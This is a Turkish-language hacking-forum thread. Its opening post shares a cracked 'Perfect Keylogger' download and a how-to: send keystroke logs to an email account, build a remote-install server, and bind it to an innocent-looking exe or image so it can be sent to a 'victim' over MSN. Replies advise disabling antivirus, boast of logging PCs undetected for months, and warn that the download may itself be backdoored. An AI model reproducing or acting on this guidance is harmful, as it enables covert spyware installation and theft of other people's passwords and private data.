Ko Hackta 1 Numara Perfect Keylogger 1.6.8.2 FuLL + AnLatım!

rapozof__

New member
Reaction score
0
Çalınan İtemlerinizi Geri Almak için Tabi Kimin Aldığını Bilmeniz gerek
Bu programla server oluşturup KARŞI tarafa gönderiyoruz msn veya başka bir yolla.........

Perfect Keylogger 1.6.8.2 FuLL + AnLatım!

Programı kurduktan sonra..

02.gif

03.gif

04.gif

05.gif

06.gif

11.gif

Buraya DİKKAT Arkadaşlar Send to : Yazan yere siz aol mailden aldığınız adresi giriyorsunuz ÖRN: [email protected] şekliden
port numbberde : 587 olcak yoksa çalışmaz
userneme ve pasword yazan yere aol aldığınız kullanıcı adını ve şifresini giriyorsunuz sonunda aol olmadan yalnızca kullanıcı adı ve password
send test dediğinizde aol hesabınıza test mesage gelicek geldiyse eğer sorunsuz çalışıyordur

12.gif

gelmediyse ayarları tekrar gözden geçirin %100 çalışmaktadır son sürümüdür. ANLAMADIĞINIZ HUSUSLARDA YARDIMCI OLACAĞIM BURDAN...

Test mailini aldıktan sonra ve ilk resimlerde ki seçeneklerde yapmanız gereken ayarları yaptıkran sonra sıra "Remote Installation" (Uzaktan Kurulum)'a geldi..! Yine ekranın sağ alt köşesinde programın ikonuna sağ tuş ile tıklıyoruz..! Remote Installation'a tıklıyoruz..!

16.gif

İleri yada Next diyoruz.
17.gif

Kırmızı kutuyla gösterdiğim yerleri işaretliyoruz..!
18.gif

Serverımızı birleştiriceğimiz programı seçiyoruz..! Program aslında server ı yaratırken exe olarak yaratacağı için başka bir exe dosyası ile birleştirmek istiyor ama siz istediğiniz herhangi bir dosya ile birleştirebilirsiniz..! Program birleştirme işleminizi yapıyor fakat exe harici herhangi bi formattaki dosya ile birleştiği zaman mesela resim, mp3 vs. sonuç olarak yine exe yaratmış oluyor..! Yani jpg ile server birleştirdiğiniz zaman birleşmeden sonra sonuç yine exe oluyor..! Yani herhangi bir programın exe dosyası ile birleştiriseniz en mantıklı ve sağlıklı çözüm olur..!

karşı tarafta herhangi bi firewall yüklü ise bilmelisiniz ki uyarı verecektir..! Bu uyarı virüs uyarısı değil sadece izinsiz bir kurulum şeklinde olur..! Bunu kurbanınız büyük ihtimalle ne olduğunu anlayamayacaktır..! Tabiki bilinçli bir firewall kullanıcısı ne olup bittiğini anlar..! Bunun garantisi hiçbir zaman %100 olmaz..! Aklınızda olsun..! Böyle bir program elinizde olduktan sonra ne yapacağınızın yaratıcılığı artık size kalmıştır..! Bundan sonrası sizin becerinize kalmıştır..!

DOWLOAD: perfect.fll.sürüm..rar (800,73 KB) - uploaded.to
ALTERNATİF: Unlimited free file storage and free file hosting

SERİAL İÇİNDEDİR Sorularınıza En Kısa sürede CVP vericem arkadaşlar ......

ne kadar güvenilir kimbilir???
bunlar basımıza gelmesin

dosyaya keşke şifre koysaydın...indirildşkten sonra virüs taraması yapılıyor.anında siliniyor.

Böyle bişi her zaman çığır açar eline sağlık.

dosyaya keşke şifre koysaydın...indirildşkten sonra virüs taraması yapılıyor.anında siliniyor.

anti virüs programını kapatıp tekrar dene açıkken bu keyloggerı kullanmana imkan yok bütün anti virüs programları tanıyor forumda undetc programları vardır sanırım ama onlarda çoğunlukla serveri bozuyor :S yani düzgün çalılmıyor tavsiye hiç bir undetc kullanmamnız yaklaşık 8 aydır log aldığım pc ler var hala bir kere karşı pc ye kurarsanız yakalanması zor oluyor en azından nod 32 bulamıyor :D herkese başarılar

Uzaktan erişim dosyasımnı yuklediğimde kurulumda yaptıgım mail ayarları yuklu olcak demi baska bir bilge yuklediğimde mail ayarları ıcınde kurulu olcak zaten demi

uzaktan erişimle hazırladıgım dosyayı bır baskasına yukledım fakat hala maıl gelmedı bana

Arkadaşlar keylogger da bir virüs olduğu için bunu kendiniz bile yazsanız kullanmanız için antivirüs programınız kapamanız gerekir.. Benim tavsiyem bilmediğiniz bir yerden keylogger indirmeyin ne çıkacağı belli olmaz yapabiliyorsanız kendiniz yazın yapamıyorsanız araştırın çok zor bir şey değil internette hazır kodlarını veriyorlar.. Tabi bu kodları da kontrol etmenizde de fayda var..

Üstelik bu arkadaş programa kendisinin verdiği bir portu girmenizi istemiş bu da biraz göz kırpıyor sanki ^^

Bence sakın bunu indirmeyın ben kullanmadıgım bır bılgısayara yukledım ılk yukleyısımde logları gonderdı daha sonra gelen log falan yok tamamen kendı sahsına yapmıs bu progu kesınlıkle yuklemeyın ındırdıysenızde formatlayın bılgınızı

kardeşim ben indirdim bütün dediklerini yaptım fakat send test dediğimde hata alıyrum ilgilenirsen cok sevirinm hatam su

an error occurad sending to message, error 8004020c
response;553 5.7.1 [email protected] sender adress rejected.
not owned by user ismail_can

Geri